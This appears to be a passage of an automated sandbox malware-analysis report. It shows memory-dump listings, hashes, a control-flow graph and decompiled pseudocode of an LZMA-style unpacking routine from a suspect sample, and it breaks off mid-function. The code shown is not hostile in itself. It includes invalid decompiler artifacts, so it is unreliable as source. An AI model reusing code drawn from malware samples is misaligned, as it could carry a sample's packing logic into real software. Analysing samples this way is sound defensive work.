                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                      • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                      • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                      • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 748 407395-407399 749 4073bb-4073c8 748->749 750 40739b-40749d 748->750 752 4073cb-4073e0 749->752 760 4074c7-4074cb 750->760 753 4073e2-4073f8 752->753 754 4073fa-407410 752->754 756 407413-40741a 753->756 754->756 758 407441 756->758 759 40741c-407420 756->759 765 407447-40744d 758->765 763 407426-40743e 759->763 764 4075cf-4075d9 759->764 761 40752b-40753e 760->761 762 4074cd-4074ee 760->762 761->765 766 4074f0-407505 762->766 767 407507-40751a 762->767 763->758 768 4075e5-4075f8 764->768 770 406bf2 765->770 771 4075fa 765->771 772 40751d-407524 766->772 767->772 773 4075fd-407601 768->773 774 406bf9-406bfd 770->774 775 406d39-406d5a 770->775 776 406c9e-406ca2 770->776 777 406d0e-406d12 770->777 771->773 778 4074c4 772->778 779 407526 772->779 774->768 780 406c03-406c10 774->780 775->752 784 406ca8-406cc1 776->784 785 40754e-407558 776->785 781 406d18-406d2c 777->781 782 40755d-407567 777->782 778->760 786 4074a9-4074c1 779->786 787 4075db 779->787 780->771 788 406c16-406c5c 780->788 789 406d2f-406d37 781->789 782->768 790 406cc4-406cc8 784->790 785->768 786->778 787->768 791 406c84-406c86 788->791 792 406c5e-406c62 788->792 789->775 789->777 790->776 793 406cca-406cd0 790->793 798 406c94-406c9c 791->798 799 406c88-406c92 791->799 796 406c64-406c67 GlobalFree 792->796 797 406c6d-406c7b GlobalAlloc 792->797 794 406cd2-406cd9 793->794 795 406cfa-406d0c 793->795 800 406ce4-406cf4 GlobalAlloc 794->800 801 406cdb-406cde GlobalFree 794->801 795->789 796->797 797->771 802 406c81 797->802 798->790 799->798 799->799 800->771 800->795 801->800 802->791
                                      C-Code - Quality: 98%
                                      			E00407395() {
                                      				void _t533;
                                      				signed int _t534;
                                      				signed int _t535;
                                      				signed int* _t605;
                                      				void* _t612;
                                      
                                      				L0:
                                      				while(1) {
                                      					L0:
                                      					if( *(_t612 - 0x40) != 0) {
                                      						 *(_t612 - 0x84) = 0x13;
                                      						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                      						goto L132;
                                      					} else {
                                      						__eax =  *(__ebp - 0x4c);
                                      						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                      						__ecx =  *(__ebp - 0x58);
                                      						__eax =  *(__ebp - 0x4c) << 4;
                                      						__eax =  *(__ebp - 0x58) + __eax + 4;
                                      						L130:
                                      						 *(__ebp - 0x58) = __eax;
                                      						 *(__ebp - 0x40) = 3;
                                      						L144:
                                      						 *(__ebp - 0x7c) = 0x14;
                                      						L145:
                                      						__eax =  *(__ebp - 0x40);
                                      						 *(__ebp - 0x50) = 1;
                                      						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                      						L149:
                                      						if( *(__ebp - 0x48) <= 0) {
                                      							__ecx =  *(__ebp - 0x40);
                                      							__ebx =  *(__ebp - 0x50);
                                      							0 = 1;
                                      							__eax = 1 << __cl;
                                      							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                      							__eax =  *(__ebp - 0x7c);
                                      							 *(__ebp - 0x44) = __ebx;
                                      							while(1) {
                                      								L140:
                                      								 *(_t612 - 0x88) = _t533;
                                      								while(1) {
                                      									L1:
                                      									_t534 =  *(_t612 - 0x88);
                                      									if(_t534 > 0x1c) {
                                      										break;
                                      									}
                                      									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                      										case 0:
                                      											if( *(_t612 - 0x6c) == 0) {
                                      												goto L170;
                                      											}
                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                      											_t534 =  *( *(_t612 - 0x70));
                                      											if(_t534 > 0xe1) {
                                      												goto L171;
                                      											}
                                      											_t538 = _t534 & 0x000000ff;
                                      											_push(0x2d);
                                      											asm("cdq");
                                      											_pop(_t569);
                                      											_push(9);
                                      											_pop(_t570);
                                      											_t608 = _t538 / _t569;
                                      											_t540 = _t538 % _t569 & 0x000000ff;
                                      											asm("cdq");
                                      											_t603 = _t540 % _t570 & 0x000000ff;
                                      											 *(_t612 - 0x3c) = _t603;
                                      											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                      											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                      											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                      											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                      												L10:
                                      												if(_t611 == 0) {
                                      													L12:
                                      													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                      													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                      													goto L15;
                                      												} else {
                                      													goto L11;
                                      												}
                                      												do {
                                      													L11:
                                      													_t611 = _t611 - 1;
                                      													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                      												} while (_t611 != 0);
                                      												goto L12;
                                      											}
                                      											if( *(_t612 - 4) != 0) {
                                      												GlobalFree( *(_t612 - 4));
                                      											}
                                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                      											 *(_t612 - 4) = _t534;
                                      											if(_t534 == 0) {
                                      												goto L171;
                                      											} else {
                                      												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                      												goto L10;
                                      											}
                                      										case 1:
                                      											L13:
                                      											__eflags =  *(_t612 - 0x6c);
                                      											if( *(_t612 - 0x6c) == 0) {
                                      												 *(_t612 - 0x88) = 1;
                                      												goto L170;
                                      											}
                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                      											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                      											_t45 = _t612 - 0x48;
                                      											 *_t45 =  *(_t612 - 0x48) + 1;
                                      											__eflags =  *_t45;
                                      											L15:
                                      											if( *(_t612 - 0x48) < 4) {
                                      												goto L13;
                                      											}
                                      											_t546 =  *(_t612 - 0x40);
                                      											if(_t546 ==  *(_t612 - 0x74)) {
                                      												L20:
                                      												 *(_t612 - 0x48) = 5;
                                      												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                      												goto L23;
                                      											}
                                      											 *(_t612 - 0x74) = _t546;
                                      											if( *(_t612 - 8) != 0) {
                                      												GlobalFree( *(_t612 - 8));
                                      											}
                                      											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                      											 *(_t612 - 8) = _t534;
                                      											if(_t534 == 0) {
                                      												goto L171;
                                      											} else {
                                      												goto L20;
                                      											}
                                      										case 2:
                                      											L24:
                                      											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                      											 *(_t612 - 0x84) = 6;
                                      											 *(_t612 - 0x4c) = _t553;
                                      											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                      											goto L132;
                                      										case 3:
                                      											L21:
                                      											__eflags =  *(_t612 - 0x6c);
                                      											if( *(_t612 - 0x6c) == 0) {
                                      												 *(_t612 - 0x88) = 3;
                                      												goto L170;
                                      											}
                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                      											_t67 = _t612 - 0x70;
                                      											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                      											__eflags =  *_t67;
                                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                      											L23:
                                      											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                      											if( *(_t612 - 0x48) != 0) {
                                      												goto L21;
                                      											}
                                      											goto L24;
                                      										case 4:
                                      											L133:
                                      											_t531 =  *_t605;
                                      											_t588 = _t531 & 0x0000ffff;
                                      											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                      											if( *(_t612 - 0xc) >= _t564) {
                                      												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                      												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                      												 *(_t612 - 0x40) = 1;
                                      												_t532 = _t531 - (_t531 >> 5);
                                      												__eflags = _t532;
                                      												 *_t605 = _t532;
                                      											} else {
                                      												 *(_t612 - 0x10) = _t564;
                                      												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                      												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                      											}
                                      											if( *(_t612 - 0x10) >= 0x1000000) {
                                      												goto L139;
                                      											} else {
                                      												goto L137;
                                      											}
                                      										case 5:
                                      											L137:
                                      											if( *(_t612 - 0x6c) == 0) {
                                      												 *(_t612 - 0x88) = 5;
                                      												goto L170;
                                      											}
                                      											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                      											L139:
                                      											_t533 =  *(_t612 - 0x84);
                                      											goto L140;
                                      										case 6:
                                      											__edx = 0;
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												__eax =  *(__ebp - 4);
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x34) = 1;
                                      												 *(__ebp - 0x84) = 7;
                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                      												goto L132;
                                      											}
                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                      											__esi =  *(__ebp - 0x60);
                                      											__cl = 8;
                                      											__cl = 8 -  *(__ebp - 0x3c);
                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                      											__ecx =  *(__ebp - 0x3c);
                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                      											__ecx =  *(__ebp - 4);
                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                      											__eflags =  *(__ebp - 0x38) - 4;
                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      											if( *(__ebp - 0x38) >= 4) {
                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                      												if( *(__ebp - 0x38) >= 0xa) {
                                      													_t98 = __ebp - 0x38;
                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                      													__eflags =  *_t98;
                                      												} else {
                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                      												}
                                      											} else {
                                      												 *(__ebp - 0x38) = 0;
                                      											}
                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                      											if( *(__ebp - 0x34) == __edx) {
                                      												__ebx = 0;
                                      												__ebx = 1;
                                      												goto L61;
                                      											} else {
                                      												__eax =  *(__ebp - 0x14);
                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      												__eflags = __eax -  *(__ebp - 0x74);
                                      												if(__eax >=  *(__ebp - 0x74)) {
                                      													__eax = __eax +  *(__ebp - 0x74);
                                      													__eflags = __eax;
                                      												}
                                      												__ecx =  *(__ebp - 8);
                                      												__ebx = 0;
                                      												__ebx = 1;
                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                      												goto L41;
                                      											}
                                      										case 7:
                                      											__eflags =  *(__ebp - 0x40) - 1;
                                      											if( *(__ebp - 0x40) != 1) {
                                      												__eax =  *(__ebp - 0x24);
                                      												 *(__ebp - 0x80) = 0x16;
                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      												__eax =  *(__ebp - 0x28);
                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      												__eax =  *(__ebp - 0x2c);
                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      												__eax = 0;
                                      												__eflags =  *(__ebp - 0x38) - 7;
                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      												__al = __al & 0x000000fd;
                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                      												__eax =  *(__ebp - 4);
                                      												__eax =  *(__ebp - 4) + 0x664;
                                      												__eflags = __eax;
                                      												 *(__ebp - 0x58) = __eax;
                                      												goto L69;
                                      											}
                                      											__eax =  *(__ebp - 4);
                                      											__ecx =  *(__ebp - 0x38);
                                      											 *(__ebp - 0x84) = 8;
                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                      											goto L132;
                                      										case 8:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												__eax =  *(__ebp - 4);
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x84) = 0xa;
                                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                      											} else {
                                      												__eax =  *(__ebp - 0x38);
                                      												__ecx =  *(__ebp - 4);
                                      												__eax =  *(__ebp - 0x38) + 0xf;
                                      												 *(__ebp - 0x84) = 9;
                                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                      											}
                                      											goto L132;
                                      										case 9:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												goto L90;
                                      											}
                                      											__eflags =  *(__ebp - 0x60);
                                      											if( *(__ebp - 0x60) == 0) {
                                      												goto L171;
                                      											}
                                      											__eax = 0;
                                      											__eflags =  *(__ebp - 0x38) - 7;
                                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                      											__eflags = _t259;
                                      											0 | _t259 = _t259 + _t259 + 9;
                                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                      											goto L76;
                                      										case 0xa:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												__eax =  *(__ebp - 4);
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x84) = 0xb;
                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                      												goto L132;
                                      											}
                                      											__eax =  *(__ebp - 0x28);
                                      											goto L89;
                                      										case 0xb:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												__ecx =  *(__ebp - 0x24);
                                      												__eax =  *(__ebp - 0x20);
                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      											} else {
                                      												__eax =  *(__ebp - 0x24);
                                      											}
                                      											__ecx =  *(__ebp - 0x28);
                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      											L89:
                                      											__ecx =  *(__ebp - 0x2c);
                                      											 *(__ebp - 0x2c) = __eax;
                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      											L90:
                                      											__eax =  *(__ebp - 4);
                                      											 *(__ebp - 0x80) = 0x15;
                                      											__eax =  *(__ebp - 4) + 0xa68;
                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                      											goto L69;
                                      										case 0xc:
                                      											L100:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												 *(__ebp - 0x88) = 0xc;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t335 = __ebp - 0x70;
                                      											 *_t335 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t335;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											__eax =  *(__ebp - 0x2c);
                                      											goto L102;
                                      										case 0xd:
                                      											L37:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												 *(__ebp - 0x88) = 0xd;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t122 = __ebp - 0x70;
                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t122;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											L39:
                                      											__eax =  *(__ebp - 0x40);
                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                      												goto L48;
                                      											}
                                      											__eflags = __ebx - 0x100;
                                      											if(__ebx >= 0x100) {
                                      												goto L54;
                                      											}
                                      											L41:
                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                      											__ecx =  *(__ebp - 0x58);
                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                      											 *(__ebp - 0x48) = __eax;
                                      											__eax = __eax + 1;
                                      											__eax = __eax << 8;
                                      											__eax = __eax + __ebx;
                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      											__ax =  *__esi;
                                      											 *(__ebp - 0x54) = __esi;
                                      											__edx = __ax & 0x0000ffff;
                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                      											if( *(__ebp - 0xc) >= __ecx) {
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      												__cx = __ax;
                                      												 *(__ebp - 0x40) = 1;
                                      												__cx = __ax >> 5;
                                      												__eflags = __eax;
                                      												__ebx = __ebx + __ebx + 1;
                                      												 *__esi = __ax;
                                      											} else {
                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                      												 *(__ebp - 0x10) = __ecx;
                                      												0x800 = 0x800 - __edx;
                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                      												__ebx = __ebx + __ebx;
                                      												 *__esi = __cx;
                                      											}
                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      											 *(__ebp - 0x44) = __ebx;
                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                      												goto L39;
                                      											} else {
                                      												goto L37;
                                      											}
                                      										case 0xe:
                                      											L46:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												 *(__ebp - 0x88) = 0xe;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t156 = __ebp - 0x70;
                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t156;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											while(1) {
                                      												L48:
                                      												__eflags = __ebx - 0x100;
                                      												if(__ebx >= 0x100) {
                                      													break;
                                      												}
                                      												__eax =  *(__ebp - 0x58);
                                      												__edx = __ebx + __ebx;
                                      												__ecx =  *(__ebp - 0x10);
                                      												__esi = __edx + __eax;
                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                      												__ax =  *__esi;
                                      												 *(__ebp - 0x54) = __esi;
                                      												__edi = __ax & 0x0000ffff;
                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                      												if( *(__ebp - 0xc) >= __ecx) {
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      													__cx = __ax;
                                      													_t170 = __edx + 1; // 0x1
                                      													__ebx = _t170;
                                      													__cx = __ax >> 5;
                                      													__eflags = __eax;
                                      													 *__esi = __ax;
                                      												} else {
                                      													 *(__ebp - 0x10) = __ecx;
                                      													0x800 = 0x800 - __edi;
                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      													__ebx = __ebx + __ebx;
                                      													 *__esi = __cx;
                                      												}
                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      												 *(__ebp - 0x44) = __ebx;
                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                      													continue;
                                      												} else {
                                      													goto L46;
                                      												}
                                      											}
                                      											L54:
                                      											_t173 = __ebp - 0x34;
                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                      											__eflags =  *_t173;
                                      											goto L55;
                                      										case 0xf:
                                      											L58:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												 *(__ebp - 0x88) = 0xf;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t203 = __ebp - 0x70;
                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t203;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											L60:
                                      											__eflags = __ebx - 0x100;
                                      											if(__ebx >= 0x100) {
                                      												L55:
                                      												__al =  *(__ebp - 0x44);
                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                      												goto L56;
                                      											}
                                      											L61:
                                      											__eax =  *(__ebp - 0x58);
                                      											__edx = __ebx + __ebx;
                                      											__ecx =  *(__ebp - 0x10);
                                      											__esi = __edx + __eax;
                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                      											__ax =  *__esi;
                                      											 *(__ebp - 0x54) = __esi;
                                      											__edi = __ax & 0x0000ffff;
                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                      											if( *(__ebp - 0xc) >= __ecx) {
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      												__cx = __ax;
                                      												_t217 = __edx + 1; // 0x1
                                      												__ebx = _t217;
                                      												__cx = __ax >> 5;
                                      												__eflags = __eax;
                                      												 *__esi = __ax;
                                      											} else {
                                      												 *(__ebp - 0x10) = __ecx;
                                      												0x800 = 0x800 - __edi;
                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      												__ebx = __ebx + __ebx;
                                      												 *__esi = __cx;
                                      											}
                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      											 *(__ebp - 0x44) = __ebx;
                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                      												goto L60;
                                      											} else {
                                      												goto L58;
                                      											}
                                      										case 0x10:
                                      											L110:
                                      											__eflags =  *(__ebp - 0x6c);
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												 *(__ebp - 0x88) = 0x10;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t366 = __ebp - 0x70;
                                      											 *_t366 =  *(__ebp - 0x70) + 1;
                                      											__eflags =  *_t366;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											goto L112;
                                      										case 0x11:
                                      											L69:
                                      											__esi =  *(__ebp - 0x58);
                                      											 *(__ebp - 0x84) = 0x12;
                                      											L132:
                                      											 *(_t612 - 0x54) = _t605;
                                      											goto L133;
                                      										case 0x12:
                                      											goto L0;
                                      										case 0x13:
                                      											__eflags =  *(__ebp - 0x40);
                                      											if( *(__ebp - 0x40) != 0) {
                                      												_t469 = __ebp - 0x58;
                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                      												__eflags =  *_t469;
                                      												 *(__ebp - 0x30) = 0x10;
                                      												 *(__ebp - 0x40) = 8;
                                      												goto L144;
                                      											}
                                      											__eax =  *(__ebp - 0x4c);
                                      											__ecx =  *(__ebp - 0x58);
                                      											__eax =  *(__ebp - 0x4c) << 4;
                                      											 *(__ebp - 0x30) = 8;
                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                      											goto L130;
                                      										case 0x14:
                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                      											__eax =  *(__ebp - 0x80);
                                      											L140:
                                      											 *(_t612 - 0x88) = _t533;
                                      											goto L1;
                                      										case 0x15:
                                      											__eax = 0;
                                      											__eflags =  *(__ebp - 0x38) - 7;
                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      											__al = __al & 0x000000fd;
                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                      											goto L121;
                                      										case 0x16:
                                      											__eax =  *(__ebp - 0x30);
                                      											__eflags = __eax - 4;
